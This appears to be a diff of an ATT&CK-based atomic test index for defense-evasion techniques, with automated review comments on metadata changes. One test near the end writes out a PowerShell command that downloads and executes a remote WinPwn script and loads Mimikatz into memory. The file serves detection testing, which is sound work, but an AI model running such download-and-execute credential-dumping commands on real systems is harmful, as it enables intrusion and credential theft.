+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
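Review bot: The one real information loss in the T1556.002 rewrite is the removal of `x_mitre_permissions_required` with `Administrator` and `SYSTEM`, which has no replacement in the new object; the other removed keys reappear with the same values, and `revoked: false`, `x_mitre_version: '2.1'` and `x_mitre_attack_spec_version: 3.2.0` are the expected upstream additions. If upstream has dropped that field, note it in the PR description; the detection text in context (writes to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages`) is now the only hint in this entry that the technique requires elevated rights.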
@@ -5894,7 +5955,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -5920,7 +5980,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -5943,8 +6003,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -6040,7 +6098,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests:
- name: Prevent Powershell History Logging
@@ -6086,60 +6143,71 @@ defense-evasion:
name: powershell
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests:
- name: Indirect Command Execution - pcalua.exe
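Review bot: The substantive changes for T1202 are easy to miss among the reordered keys and should be listed in the PR description: the description gains the Scriptrunner.exe sentence with three new references (Bleeping Computer, Secure Team, SS64), Liran Ravich is added as a contributor, `x_mitre_version` goes from 1.1 to 1.2, and the two tweet citations move from twitter.com to x.com with Retrieved dates refreshed to September 12, 2024. The version bump matches a description change, so nothing here looks wrong; everything else in the hunk is the same content in a new position.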
@@ -6314,7 +6382,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
@@ -6362,17 +6429,20 @@ defense-evasion:
name: command_prompt
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
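Review bot: The block scalar indicator for the T1562 description changes from `|-` to `|+`, which keeps every trailing newline of the scalar, so the description value now ends with one or more newline characters while every other `description:` in this file uses `|-` and strips them. This is harmless for display but changes string equality and hashes for any tool that compares descriptions across releases; trimming trailing whitespace in the generator before serializing would keep the style at `|-`. The merged second paragraph and the added UNC3886 citation otherwise look like a faithful upstream update, and the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys have only moved up from the end of the object.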
@@ -6381,15 +6451,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
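Review bot: `Office 365` disappears from the T1562 platform list and `Identity Provider` and `Office Suite` take its place, with the version bump to 1.6 matching. Any per-platform index that is derived from `x_mitre_platforms` (for example an Office 365 index) will lose this technique unless the generator maps the old platform names onto the new ones; check the generated platform indexes in this PR for techniques that vanished rather than moved.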
@@ -6427,15 +6499,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests:
- name: Windows Disable LSA Protection
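Review bot: The new Google Cloud Mandiant UNC3886 2024 citation has a leading space in its description (`" Punsaen Boonyakarn, ..."`), which is also why the scalar is emitted double-quoted instead of plain like the neighbouring entries; trimming the string in the generator would remove both oddities. A pre-existing inconsistency in the adjacent Emotet shutdown reference: the description dates it `2022, November 8` while the URL path is `2022/11/28`, which is worth reporting upstream.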
@@ -6483,7 +6557,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -6531,8 +6605,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests:
- name: Thread Execution Hijacking
@@ -6551,7 +6623,7 @@ defense-evasion:
name: powershell
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -6567,7 +6639,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -6592,6 +6664,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -6609,8 +6682,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -6623,7 +6696,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests:
- name: System File Copied to Unusual Location
@@ -6671,7 +6743,7 @@ defense-evasion:
name: powershell
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -6708,9 +6780,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
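Review bot: For T1070.008 both `Office 365` and `Google Workspace` are replaced by the single `Office Suite` platform, with `x_mitre_version` going 1.1 to 1.2. If a Google Workspace platform index is generated from this field, it only keeps this technique when the generator treats `Office Suite` as covering the former Google Workspace platform; confirm that mapping exists, otherwise the technique silently drops out of that index.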
@@ -6748,9 +6819,8 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests:
- name: Copy and Delete Mailbox Data on Windows
@@ -6791,7 +6861,7 @@ defense-evasion:
elevation_required: true
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
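Review bot: `modified` for T1055 moves backwards, from 2023-05-09 to 2023-03-30. The same regression appears for T1205 (2022-11-08 to 2022-10-19), T1218.002 (2022-05-11 to 2022-03-11), Network Address Translation Traversal (2021-04-29 to 2020-10-21), T1553.003 and T1553.006 (2022-05-24 to 2022-05-05) and T1207 (2022-05-11 to 2022-03-08). An earlier timestamp after regeneration usually means the previous values came from a different object or a collection-level override than the current ones; state which ATT&CK bundle the generator now reads from so reviewers don't mistake this for stale data being reintroduced.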
@@ -6894,7 +6964,6 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests:
- name: Shellcode execution via VBA
@@ -7306,7 +7375,7 @@ defense-evasion:
elevation_required: true
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -7390,7 +7459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -7457,7 +7525,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests:
- name: mavinject - Inject DLL into running process
@@ -7923,55 +7990,73 @@ defense-evasion:
elevation_required: false
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests:
- name: Windows - Modify file creation timestamp with PowerShell
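Review bot: the rewritten T1070.006 description now separates `$STANDARD_INFORMATION` timestomping (user-level API calls) from `$FILE_NAME` timestomping (kernel interaction, or a move/rename) and introduces double timestomping, and adds `Process: OS API Execution` and `Command: Command Execution` as data sources. The atomic visible at the end of the hunk, `Windows - Modify file creation timestamp with PowerShell`, is the user-level `$SI` case, which an `$SI`/`$FN` mismatch check would still catch; it would help test authors if the index noted that no atomic here exercises the `$FN` or double-timestomp variant the description now calls out. Dropping `x_mitre_permissions_required` (root/SYSTEM/User) matches the upstream field removal, so nothing to do there.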
@@ -8243,7 +8328,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
@@ -8258,6 +8342,74 @@ defense-evasion:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
